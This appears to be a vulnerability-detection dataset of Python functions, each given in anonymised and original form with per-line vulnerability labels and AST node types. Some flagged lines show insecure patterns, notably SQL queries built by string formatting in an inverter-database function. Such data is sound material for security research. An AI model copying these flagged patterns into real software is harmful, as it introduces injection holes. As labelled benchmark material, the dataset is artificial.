lines
sequencelengths
1
444
raw_lines
sequencelengths
1
444
label
sequencelengths
1
444
type
sequencelengths
1
444
[ "def FUNC_0(self):...\n", "VAR_16 = self.config.get_connection_interfaces()\n", "for source in VAR_16:\n", "if source['type'] == 'inverter':\n", "VAR_20 = 'string' % (source['serial_id'], 0, source['prev_etotal'])\n", "self.c.execute(VAR_20)\n", "VAR_20 = 'string' % (source['name'], source['inverter_type'],\n 's0-bridge v0', 'OK', int(datetime.now().timestamp()), source['serial_id'])\n", "self.c.execute(VAR_20)\n", "self.db.commit()\n" ]
[ "def add_inverters(self):...\n", "interfaces = self.config.get_connection_interfaces()\n", "for source in interfaces:\n", "if source['type'] == 'inverter':\n", "query = (\n \"\"\"\n INSERT OR IGNORE INTO Inverters (\n Serial,\n EToday,\n ETotal\n ) VALUES (\n %s,\n %s,\n %s\n );\n \"\"\"\n % (source['serial_id'], 0, source['prev_etotal']))\n", "self.c.execute(query)\n", "query = (\n \"\"\"\n UPDATE Inverters\n SET \n Name='%s', \n Type='%s', \n SW_Version='%s', \n Status='%s',\n TimeStamp='%s'\n WHERE Serial='%s';\n \"\"\"\n % (source['name'], source['inverter_type'], 's0-bridge v0', 'OK', int(\n datetime.now().timestamp()), source['serial_id']))\n", "self.c.execute(query)\n", "self.db.commit()\n" ]
[ 0, 0, 0, 0, 4, 4, 4, 0, 0 ]
[ "FunctionDef'", "Assign'", "For", "Condition", "Assign'", "Expr'", "Assign'", "Expr'", "Expr'" ]
[ "def FUNC_2(VAR_4):...\n", "VAR_5 = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "VAR_6 = re.findall(VAR_5, VAR_2.written[0])\n", "self.assertEquals(len(VAR_6), 1)\n" ]
[ "def assert_response(_):...\n", "expected = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "matches = re.findall(expected, request.written[0])\n", "self.assertEquals(len(matches), 1)\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Expr'" ]
[ "def FUNC_4(self, VAR_5='/'):...\n", "VAR_6 = os.path.join(self.namespace, VAR_5)\n", "if VAR_6 != '/':\n", "VAR_6 = VAR_6.rstrip('/')\n", "VAR_7 = self.etcd.read(VAR_6, recursive=True)\n", "return None\n", "VAR_3 = FUNC_2()\n", "for entry in VAR_7.get_subtree():\n", "if entry.key == VAR_6:\n", "return sorted(VAR_3)\n", "VAR_8 = entry.key[len(VAR_6):]\n", "if entry.dir and not VAR_8.endswith('/'):\n", "VAR_8 += '/'\n", "VAR_3.add(VAR_8.lstrip('/'))\n" ]
[ "def list(self, keyfilter='/'):...\n", "path = os.path.join(self.namespace, keyfilter)\n", "if path != '/':\n", "path = path.rstrip('/')\n", "result = self.etcd.read(path, recursive=True)\n", "return None\n", "value = set()\n", "for entry in result.get_subtree():\n", "if entry.key == path:\n", "return sorted(value)\n", "name = entry.key[len(path):]\n", "if entry.dir and not name.endswith('/'):\n", "name += '/'\n", "value.add(name.lstrip('/'))\n" ]
[ 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Assign'", "Return'", "Assign'", "For", "Condition", "Return'", "Assign'", "Condition", "AugAssign'", "Expr'" ]
[ "def FUNC_19(VAR_11, VAR_1, VAR_20, VAR_3, VAR_19):...\n", "" ]
[ "def handleStorageOps(item, stack, storage, symbols, userIn):...\n", "" ]
[ 0, 0 ]
[ "FunctionDef'", "Condition" ]
[ "def __init__(self):...\n", "self.__connection = mysql.connect(**conf.DATABASE)\n", "self.cursor = self.__connection.cursor()\n" ]
[ "def __init__(self):...\n", "self.__connection = mysql.connect(**conf.DATABASE)\n", "self.cursor = self.__connection.cursor()\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'" ]
[ "def FUNC_13(self):...\n", "if self.accept(CLASS_1.REDIRECT_OUT):\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "if self.accept(CLASS_1.REDIRECT_APPEND):\n", "return CLASS_10(1, (VAR_44, os.O_CREAT | os.O_WRONLY | os.O_TRUNC))\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "if self.accept(CLASS_1.REDIRECT_IN):\n", "return CLASS_10(1, (VAR_44, os.O_CREAT | os.O_WRONLY | os.O_APPEND))\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "return None\n", "return CLASS_10(0, (VAR_44, os.O_RDONLY))\n" ]
[ "def redirection(self):...\n", "if self.accept(TokenType.REDIRECT_OUT):\n", "filename = self.expect(TokenType.WORD).lexeme\n", "if self.accept(TokenType.REDIRECT_APPEND):\n", "return RedirectionHelper(1, (filename, os.O_CREAT | os.O_WRONLY | os.O_TRUNC))\n", "filename = self.expect(TokenType.WORD).lexeme\n", "if self.accept(TokenType.REDIRECT_IN):\n", "return RedirectionHelper(1, (filename, os.O_CREAT | os.O_WRONLY | os.O_APPEND))\n", "filename = self.expect(TokenType.WORD).lexeme\n", "return None\n", "return RedirectionHelper(0, (filename, os.O_RDONLY))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Assign'", "Condition", "Return'", "Assign'", "Condition", "Return'", "Assign'", "Return'", "Return'" ]
[ "def FUNC_7(self):...\n", "return self.data\n" ]
[ "def to_json(self):...\n", "return self.data\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_36(self, VAR_20):...\n", "return ''.join(FUNC_8(VAR_20)) == '*'\n" ]
[ "def is_dummy_password(self, pwd):...\n", "return ''.join(set(pwd)) == '*'\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_16(self):...\n", "VAR_43 = log_check_output(['svn', 'st', '--xml', self.directory],\n universal_newlines=True)\n", "VAR_44 = ElementTree.fromstring(VAR_43)\n", "for entry in VAR_44.findall(\n", "return True\n", "return False\n" ]
[ "def has_local_edit(self):...\n", "xml = log_check_output(['svn', 'st', '--xml', self.directory],\n universal_newlines=True)\n", "doc = ElementTree.fromstring(xml)\n", "for entry in doc.findall(\n", "return True\n", "return False\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "For", "Return'", "Return'" ]
[ "def FUNC_0(VAR_2, VAR_3=None, VAR_4=None, VAR_5=None):...\n", "VAR_8 = None\n", "if VAR_3 is not None:\n", "VAR_8 = get_object_or_404(VAR_5, **{group_slug_field: group_slug})\n", "return VAR_2, VAR_8\n", "VAR_2 = VAR_2.filter(content_type=get_ct(group), object_id=group.id)\n" ]
[ "def get_articles_by_group(article_qs, group_slug=None, group_slug_field=...\n", "group = None\n", "if group_slug is not None:\n", "group = get_object_or_404(group_qs, **{group_slug_field: group_slug})\n", "return article_qs, group\n", "article_qs = article_qs.filter(content_type=get_ct(group), object_id=group.id)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Return'", "Assign'" ]
[ "@classmethod...\n", "if VAR_6 == 'custom':\n", "return VAR_7\n", "return '{}_{}'.format(VAR_7, VAR_6.replace('.', '_'))\n" ]
[ "@classmethod...\n", "if version == 'custom':\n", "return tool\n", "return '{}_{}'.format(tool, version.replace('.', '_'))\n" ]
[ 7, 0, 0, 0 ]
[ "Condition", "Condition", "Return'", "Return'" ]
[ "def FUNC_22(self, VAR_3):...\n", "if self.allowed_email_whitelist is not None:\n", "return VAR_3 in self.allowed_email_whitelist\n", "return True\n" ]
[ "def passes_email_whitelist(self, email):...\n", "if self.allowed_email_whitelist is not None:\n", "return email in self.allowed_email_whitelist\n", "return True\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Return'", "Return'" ]
[ "def FUNC_6(self):...\n", "return True\n" ]
[ "def Done(self):...\n", "return True\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_13(self, VAR_16):...\n", "return VAR_6 in VAR_16.bookmarks\n" ]
[ "def does_intersect_rule(self, rulectx):...\n", "return bookmark in rulectx.bookmarks\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_6(self):...\n", "VAR_14 = self.client.get('/get_data/')\n", "self.assertEqual(VAR_14.status_code, 200)\n", "self.assertContains(VAR_14, 'Download PUCs')\n" ]
[ "def test_download_pucs_button(self):...\n", "response = self.client.get('/get_data/')\n", "self.assertEqual(response.status_code, 200)\n", "self.assertContains(response, 'Download PUCs')\n" ]
[ 0, 6, 6, 0 ]
[ "FunctionDef'", "Assign'", "Expr'", "Expr'" ]
[ "def FUNC_1(self) ->MessageDTO:...\n", "\"\"\"docstring\"\"\"\n", "VAR_20 = MessageDTO()\n", "VAR_20.message_id = self.id\n", "VAR_20.message = self.message\n", "VAR_20.sent_date = self.date\n", "VAR_20.read = self.read\n", "VAR_20.subject = self.subject\n", "VAR_20.project_id = self.project_id\n", "VAR_20.task_id = self.task_id\n", "if self.message_type is not None:\n", "VAR_20.message_type = CLASS_0(self.message_type).name\n", "if self.from_user_id:\n", "VAR_20.from_username = self.from_user.username\n", "return VAR_20\n" ]
[ "def as_dto(self) ->MessageDTO:...\n", "\"\"\"docstring\"\"\"\n", "dto = MessageDTO()\n", "dto.message_id = self.id\n", "dto.message = self.message\n", "dto.sent_date = self.date\n", "dto.read = self.read\n", "dto.subject = self.subject\n", "dto.project_id = self.project_id\n", "dto.task_id = self.task_id\n", "if self.message_type is not None:\n", "dto.message_type = MessageType(self.message_type).name\n", "if self.from_user_id:\n", "dto.from_username = self.from_user.username\n", "return dto\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Assign'", "Return'" ]
[ "def FUNC_25(VAR_20):...\n", "def FUNC_26(VAR_30, *VAR_12, **VAR_17):...\n", "if not GLSetting.memory_copy.anomaly_checks:\n", "return VAR_20(VAR_30, *VAR_12, **kw)\n", "if GLSetting.anomalies_counter[VAR_1] > alarm_level[VAR_1]:\n", "if VAR_1 == 'new_submission':\n", "return VAR_20(VAR_30, *VAR_12, **kw)\n", "log.debug('Blocked a New Submission (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'finalized_submission':\n", "log.debug('Blocked a Finalized Submission (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'anon_requests':\n", "log.debug('Blocked an Anon Request (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'file_uploaded':\n", "log.debug('Blocked a File upload (%d > %d)' % (GLSetting.anomalies_counter[\n VAR_1], alarm_level[VAR_1]))\n", "log.debug('Blocked an Unknown event (=%s) !? [BUG!] (%d > %d)' % (VAR_1,\n GLSetting.anomalies_counter[VAR_1], alarm_level[VAR_1]))\n" ]
[ "def wrapper(method_handler):...\n", "def call_handler(cls, *args, **kw):...\n", "if not GLSetting.memory_copy.anomaly_checks:\n", "return method_handler(cls, *args, **kw)\n", "if GLSetting.anomalies_counter[element] > alarm_level[element]:\n", "if element == 'new_submission':\n", "return method_handler(cls, *args, **kw)\n", "log.debug('Blocked a New Submission (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'finalized_submission':\n", "log.debug('Blocked a Finalized Submission (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'anon_requests':\n", "log.debug('Blocked an Anon Request (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'file_uploaded':\n", "log.debug('Blocked a File upload (%d > %d)' % (GLSetting.anomalies_counter[\n element], alarm_level[element]))\n", "log.debug('Blocked an Unknown event (=%s) !? [BUG!] (%d > %d)' % (element,\n GLSetting.anomalies_counter[element], alarm_level[element]))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "FunctionDef'", "Condition", "Return'", "Condition", "Condition", "Return'", "Expr'", "Condition", "Expr'", "Condition", "Expr'", "Condition", "Expr'", "Expr'" ]
[ "def FUNC_6(self, VAR_7):...\n", "VAR_8 = self.content\n", "while VAR_8:\n", "yield VAR_8[:VAR_7]\n", "VAR_8 = VAR_8[VAR_7:]\n" ]
[ "def iter_content(self, chunk_size):...\n", "c = self.content\n", "while c:\n", "yield c[:chunk_size]\n", "c = c[chunk_size:]\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Expr'", "Assign'" ]
[ "def FUNC_9(self):...\n", "for resource in set(resource for VAR_13 in self.rules for resource in\n", "if resource not in '_cores _nodes'.split():\n", "logger.info(resource)\n" ]
[ "def list_resources(self):...\n", "for resource in set(resource for rule in self.rules for resource in rule.\n", "if resource not in '_cores _nodes'.split():\n", "logger.info(resource)\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "For", "Condition", "Expr'" ]
[ "def FUNC_1(self, VAR_1, VAR_2, VAR_5, VAR_6, VAR_4={}):...\n", "\"\"\"docstring\"\"\"\n", "VAR_22 = self.pool.get('stock.location')\n", "VAR_23 = self.pool.get('account.move')\n", "VAR_24 = self.pool.get('account.move.line')\n", "VAR_25 = VAR_6.get('new_price', 0.0)\n", "VAR_19 = VAR_6.get('stock_output_account', False)\n", "VAR_18 = VAR_6.get('stock_input_account', False)\n", "VAR_20 = VAR_6.get('stock_journal', False)\n", "VAR_17 = self.browse(VAR_1, VAR_2, VAR_5)[0]\n", "VAR_21 = VAR_17.categ_id.property_stock_variation\n", "VAR_26 = VAR_21 and VAR_21.id or False\n", "if not VAR_26:\n", "VAR_27 = []\n", "VAR_28 = VAR_22.search(VAR_1, VAR_2, [('usage', '=', 'internal')])\n", "for rec_id in VAR_5:\n", "for location in VAR_22.browse(VAR_1, VAR_2, VAR_28):\n", "return VAR_27\n", "VAR_49 = VAR_4.copy()\n", "self.write(VAR_1, VAR_2, rec_id, {'standard_price': VAR_25})\n", "VAR_49.update({'location': location.id, 'compute_child': False})\n", "VAR_45 = self.browse(VAR_1, VAR_2, rec_id, VAR_4=c)\n", "VAR_53 = VAR_45.qty_available\n", "VAR_54 = VAR_45.standard_price - VAR_25\n", "if not VAR_54:\n", "if VAR_53:\n", "VAR_56 = location.company_id and location.company_id.id or False\n", "if not VAR_56:\n", "if not VAR_20:\n", "VAR_20 = (VAR_45.categ_id.property_stock_journal and VAR_45.categ_id.\n property_stock_journal.id or False)\n", "if not VAR_20:\n", "VAR_57 = VAR_23.create(VAR_1, VAR_2, {'journal_id': VAR_20, 'company_id':\n VAR_56})\n", "VAR_27.append(VAR_57)\n", "if VAR_54 > 0:\n", "if not VAR_18:\n", "if VAR_54 < 0:\n", "VAR_18 = VAR_45.product_tmpl_id.property_stock_account_input.id\n", "if not VAR_18:\n", "if not VAR_19:\n", "VAR_18 = VAR_45.categ_id.property_stock_account_input_categ.id\n", "if not VAR_18:\n", "VAR_19 = VAR_45.product_tmpl_id.property_stock_account_output.id\n", "if not VAR_19:\n", "VAR_58 = VAR_53 * VAR_54\n", "VAR_19 = VAR_45.categ_id.property_stock_account_output_categ.id\n", "if not VAR_19:\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.name, 'account_id': VAR_18,\n 'debit': VAR_58, 'move_id': VAR_57})\n", "VAR_58 = VAR_53 * -VAR_54\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.categ_id.name, 'account_id':\n VAR_26, 'credit': VAR_58, 'move_id': VAR_57})\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.name, 'account_id': VAR_19,\n 'credit': VAR_58, 'move_id': VAR_57})\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.categ_id.name, 'account_id':\n VAR_26, 'debit': VAR_58, 'move_id': VAR_57})\n" ]
[ "def do_change_standard_price(self, cr, uid, ids, datas, context={}):...\n", "\"\"\"docstring\"\"\"\n", "location_obj = self.pool.get('stock.location')\n", "move_obj = self.pool.get('account.move')\n", "move_line_obj = self.pool.get('account.move.line')\n", "new_price = datas.get('new_price', 0.0)\n", "stock_output_acc = datas.get('stock_output_account', False)\n", "stock_input_acc = datas.get('stock_input_account', False)\n", "journal_id = datas.get('stock_journal', False)\n", "product_obj = self.browse(cr, uid, ids)[0]\n", "account_variation = product_obj.categ_id.property_stock_variation\n", "account_variation_id = account_variation and account_variation.id or False\n", "if not account_variation_id:\n", "move_ids = []\n", "loc_ids = location_obj.search(cr, uid, [('usage', '=', 'internal')])\n", "for rec_id in ids:\n", "for location in location_obj.browse(cr, uid, loc_ids):\n", "return move_ids\n", "c = context.copy()\n", "self.write(cr, uid, rec_id, {'standard_price': new_price})\n", "c.update({'location': location.id, 'compute_child': False})\n", "product = self.browse(cr, uid, rec_id, context=c)\n", "qty = product.qty_available\n", "diff = product.standard_price - new_price\n", "if not diff:\n", "if qty:\n", "company_id = location.company_id and location.company_id.id or False\n", "if not company_id:\n", "if not journal_id:\n", "journal_id = (product.categ_id.property_stock_journal and product.categ_id.\n property_stock_journal.id or False)\n", "if not journal_id:\n", "move_id = move_obj.create(cr, uid, {'journal_id': journal_id, 'company_id':\n company_id})\n", "move_ids.append(move_id)\n", "if diff > 0:\n", "if not stock_input_acc:\n", "if diff < 0:\n", "stock_input_acc = product.product_tmpl_id.property_stock_account_input.id\n", "if not stock_input_acc:\n", "if not stock_output_acc:\n", "stock_input_acc = product.categ_id.property_stock_account_input_categ.id\n", "if not stock_input_acc:\n", "stock_output_acc = product.product_tmpl_id.property_stock_account_output.id\n", "if not stock_output_acc:\n", "amount_diff = qty * diff\n", "stock_output_acc = product.categ_id.property_stock_account_output_categ.id\n", "if not stock_output_acc:\n", "move_line_obj.create(cr, uid, {'name': product.name, 'account_id':\n stock_input_acc, 'debit': amount_diff, 'move_id': move_id})\n", "amount_diff = qty * -diff\n", "move_line_obj.create(cr, uid, {'name': product.categ_id.name, 'account_id':\n account_variation_id, 'credit': amount_diff, 'move_id': move_id})\n", "move_line_obj.create(cr, uid, {'name': product.name, 'account_id':\n stock_output_acc, 'credit': amount_diff, 'move_id': move_id})\n", "move_line_obj.create(cr, uid, {'name': product.categ_id.name, 'account_id':\n account_variation_id, 'debit': amount_diff, 'move_id': move_id})\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "For", "For", "Return'", "Assign'", "Expr'", "Expr'", "Assign'", "Assign'", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Assign'", "Expr'", "Condition", "Condition", "Condition", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Assign'", "Condition", "Assign'", "Assign'", "Condition", "Expr'", "Assign'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_0(VAR_4, VAR_5=None, VAR_6=None):...\n", "\"\"\"docstring\"\"\"\n", "if VAR_6 is None:\n", "VAR_6 = ray.worker.global_worker\n", "return CLASS_2(VAR_6.profiler, VAR_4, VAR_5=extra_data)\n" ]
[ "def profile(event_type, extra_data=None, worker=None):...\n", "\"\"\"docstring\"\"\"\n", "if worker is None:\n", "worker = ray.worker.global_worker\n", "return RayLogSpanRaylet(worker.profiler, event_type, extra_data=extra_data)\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Condition", "Assign'", "Return'" ]
[ "def FUNC_15(self, VAR_3=None):...\n", "\"\"\"docstring\"\"\"\n", "def FUNC_22(VAR_30, VAR_3):...\n", "if not isinstance(VAR_30, _IOFile):\n", "return IOFile(VAR_30, VAR_16=self)\n", "return VAR_30.apply_wildcards(VAR_3, fill_missing=f in self.dynamic_input,\n fail_dynamic=self.dynamic_output)\n" ]
[ "def expand_wildcards(self, wildcards=None):...\n", "\"\"\"docstring\"\"\"\n", "def concretize_iofile(f, wildcards):...\n", "if not isinstance(f, _IOFile):\n", "return IOFile(f, rule=self)\n", "return f.apply_wildcards(wildcards, fill_missing=f in self.dynamic_input,\n fail_dynamic=self.dynamic_output)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "FunctionDef'", "Condition", "Return'", "Return'" ]
[ "def FUNC_7(self):...\n", "\"\"\"docstring\"\"\"\n", "VAR_1 = self.bindings\n", "VAR_11 = '{app}-{stack}-v000'.format(app=self.TEST_APP, stack=bindings[\n 'TEST_STACK'])\n", "VAR_9 = self.agent.make_json_payload_from_kwargs(job=[{'cloudProvider':\n 'gce', 'application': self.TEST_APP, 'credentials': bindings[\n 'GCE_CREDENTIALS'], 'strategy': '', 'capacity': {'min': 2, 'max': 2,\n 'desired': 2}, 'targetSize': 2, 'image': bindings['TEST_GCE_IMAGE_NAME'\n ], 'zone': bindings['TEST_GCE_ZONE'], 'stack': bindings['TEST_STACK'],\n 'instanceType': 'f1-micro', 'type': 'createServerGroup',\n 'loadBalancers': [bindings['TEST_APP_COMPONENT_NAME']],\n 'availabilityZones': {bindings['TEST_GCE_REGION']: [bindings[\n 'TEST_GCE_ZONE']]}, 'instanceMetadata': {'startup-script':\n 'sudo apt-get update && sudo apt-get install apache2 -y',\n 'load-balancer-names': bindings['TEST_APP_COMPONENT_NAME']}, 'account':\n bindings['GCE_CREDENTIALS'], 'authScopes': ['compute'], 'user':\n '[anonymous]'}], description='Create Server Group in ' + group_name,\n application=self.TEST_APP)\n", "VAR_10 = gcp.GceContractBuilder(self.gce_observer)\n", "VAR_10.new_clause_builder('Managed Instance Group Added', retryable_for_secs=30\n ).inspect_resource('managed-instance-groups', VAR_11).contains_path_eq(\n 'targetSize', 2)\n", "return st.OperationContract(self.new_post_operation(title=\n 'create_server_group', data=payload, path='tasks'), VAR_5=builder.build())\n" ]
[ "def create_server_group(self):...\n", "\"\"\"docstring\"\"\"\n", "bindings = self.bindings\n", "group_name = '{app}-{stack}-v000'.format(app=self.TEST_APP, stack=bindings[\n 'TEST_STACK'])\n", "payload = self.agent.make_json_payload_from_kwargs(job=[{'cloudProvider':\n 'gce', 'application': self.TEST_APP, 'credentials': bindings[\n 'GCE_CREDENTIALS'], 'strategy': '', 'capacity': {'min': 2, 'max': 2,\n 'desired': 2}, 'targetSize': 2, 'image': bindings['TEST_GCE_IMAGE_NAME'\n ], 'zone': bindings['TEST_GCE_ZONE'], 'stack': bindings['TEST_STACK'],\n 'instanceType': 'f1-micro', 'type': 'createServerGroup',\n 'loadBalancers': [bindings['TEST_APP_COMPONENT_NAME']],\n 'availabilityZones': {bindings['TEST_GCE_REGION']: [bindings[\n 'TEST_GCE_ZONE']]}, 'instanceMetadata': {'startup-script':\n 'sudo apt-get update && sudo apt-get install apache2 -y',\n 'load-balancer-names': bindings['TEST_APP_COMPONENT_NAME']}, 'account':\n bindings['GCE_CREDENTIALS'], 'authScopes': ['compute'], 'user':\n '[anonymous]'}], description='Create Server Group in ' + group_name,\n application=self.TEST_APP)\n", "builder = gcp.GceContractBuilder(self.gce_observer)\n", "builder.new_clause_builder('Managed Instance Group Added',\n retryable_for_secs=30).inspect_resource('managed-instance-groups',\n group_name).contains_path_eq('targetSize', 2)\n", "return st.OperationContract(self.new_post_operation(title=\n 'create_server_group', data=payload, path='tasks'), contract=builder.\n build())\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Return'" ]
[ "def FUNC_6(self):...\n", "self.login()\n", "while True:\n", "VAR_30 = random.choice(self.tasks)\n", "self.do_step(SubmitRandomRequest(self.browser, VAR_30, VAR_10=self.base_url,\n VAR_11=self.submissions_path))\n" ]
[ "def act(self):...\n", "self.login()\n", "while True:\n", "task = random.choice(self.tasks)\n", "self.do_step(SubmitRandomRequest(self.browser, task, base_url=self.base_url,\n submissions_path=self.submissions_path))\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Condition", "Assign'", "Expr'" ]
[ "def __call__(self, VAR_11):...\n", "VAR_15 = []\n", "if self.param:\n", "for p in utils.tup(self.param):\n", "return self.run(*VAR_15)\n", "if self.post and VAR_102.post.get(p):\n", "VAR_33 = VAR_102.post[p]\n", "if self.get and VAR_102.get.get(p):\n", "VAR_15.append(VAR_33)\n", "VAR_33 = VAR_102.get[p]\n", "if self.url and VAR_11.get(p):\n", "VAR_33 = VAR_11[p]\n", "VAR_33 = self.default\n" ]
[ "def __call__(self, url):...\n", "a = []\n", "if self.param:\n", "for p in utils.tup(self.param):\n", "return self.run(*a)\n", "if self.post and request.post.get(p):\n", "val = request.post[p]\n", "if self.get and request.get.get(p):\n", "a.append(val)\n", "val = request.get[p]\n", "if self.url and url.get(p):\n", "val = url[p]\n", "val = self.default\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "For", "Return'", "Condition", "Assign'", "Condition", "Expr'", "Assign'", "Condition", "Assign'", "Assign'" ]
[ "def __init__(self, VAR_1, VAR_2, VAR_3, VAR_4=None):...\n", "self.state = ray.experimental.state.GlobalState()\n", "self.state._initialize_global_state(VAR_1, VAR_2, VAR_4=redis_password)\n", "self.redis = VAR_42.StrictRedis(host=redis_address, port=redis_port, db=0,\n password=redis_password)\n", "self.primary_subscribe_client = self.redis.pubsub(ignore_subscribe_messages\n =True)\n", "self.local_scheduler_id_to_ip_map = {}\n", "self.load_metrics = LoadMetrics()\n", "if VAR_3:\n", "self.autoscaler = StandardAutoscaler(VAR_3, self.load_metrics)\n", "self.autoscaler = None\n", "self.issue_gcs_flushes = 'RAY_USE_NEW_GCS' in os.environ\n", "self.gcs_flush_policy = None\n", "if self.issue_gcs_flushes:\n", "VAR_31 = self.redis.lrange('RedisShards', 0, -1)\n", "if len(VAR_31) > 1:\n", "VAR_0.warning(\n 'Monitor: TODO: if launching > 1 redis shard, flushing needs to touch shards in parallel.'\n )\n", "VAR_31 = VAR_31[0].split(b':')\n", "self.issue_gcs_flushes = False\n", "self.redis_shard = VAR_42.StrictRedis(host=addr_port[0], port=addr_port[1],\n password=redis_password)\n", "self.redis_shard.execute_command('HEAD.FLUSH 0')\n", "VAR_0.info('Monitor: Turning off flushing due to exception: {}'.format(str(e)))\n", "self.issue_gcs_flushes = False\n" ]
[ "def __init__(self, redis_address, redis_port, autoscaling_config,...\n", "self.state = ray.experimental.state.GlobalState()\n", "self.state._initialize_global_state(redis_address, redis_port,\n redis_password=redis_password)\n", "self.redis = redis.StrictRedis(host=redis_address, port=redis_port, db=0,\n password=redis_password)\n", "self.primary_subscribe_client = self.redis.pubsub(ignore_subscribe_messages\n =True)\n", "self.local_scheduler_id_to_ip_map = {}\n", "self.load_metrics = LoadMetrics()\n", "if autoscaling_config:\n", "self.autoscaler = StandardAutoscaler(autoscaling_config, self.load_metrics)\n", "self.autoscaler = None\n", "self.issue_gcs_flushes = 'RAY_USE_NEW_GCS' in os.environ\n", "self.gcs_flush_policy = None\n", "if self.issue_gcs_flushes:\n", "addr_port = self.redis.lrange('RedisShards', 0, -1)\n", "if len(addr_port) > 1:\n", "logger.warning(\n 'Monitor: TODO: if launching > 1 redis shard, flushing needs to touch shards in parallel.'\n )\n", "addr_port = addr_port[0].split(b':')\n", "self.issue_gcs_flushes = False\n", "self.redis_shard = redis.StrictRedis(host=addr_port[0], port=addr_port[1],\n password=redis_password)\n", "self.redis_shard.execute_command('HEAD.FLUSH 0')\n", "logger.info('Monitor: Turning off flushing due to exception: {}'.format(str(e))\n )\n", "self.issue_gcs_flushes = False\n" ]
[ 0, 0, 6, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Expr'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Expr'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'", "Assign'" ]
[ "def FUNC_3(VAR_1):...\n", "VAR_7 = 0\n", "VAR_8 = 0\n", "for VAR_2 in VAR_1:\n", "if VAR_2.try_job_url:\n", "return VAR_7, VAR_8\n", "VAR_8 += 1\n", "VAR_7 += 1\n" ]
[ "def _GetNumbersOfDataPointGroups(data_points):...\n", "build_level_number = 0\n", "revision_level_number = 0\n", "for data_point in data_points:\n", "if data_point.try_job_url:\n", "return build_level_number, revision_level_number\n", "revision_level_number += 1\n", "build_level_number += 1\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "For", "Condition", "Return'", "AugAssign'", "AugAssign'" ]
[ "def FUNC_7(self):...\n", "return self.render_string('modules/bootstrap_include.html')\n" ]
[ "def render(self):...\n", "return self.render_string('modules/bootstrap_include.html')\n" ]
[ 0, 6 ]
[ "FunctionDef'", "Return'" ]
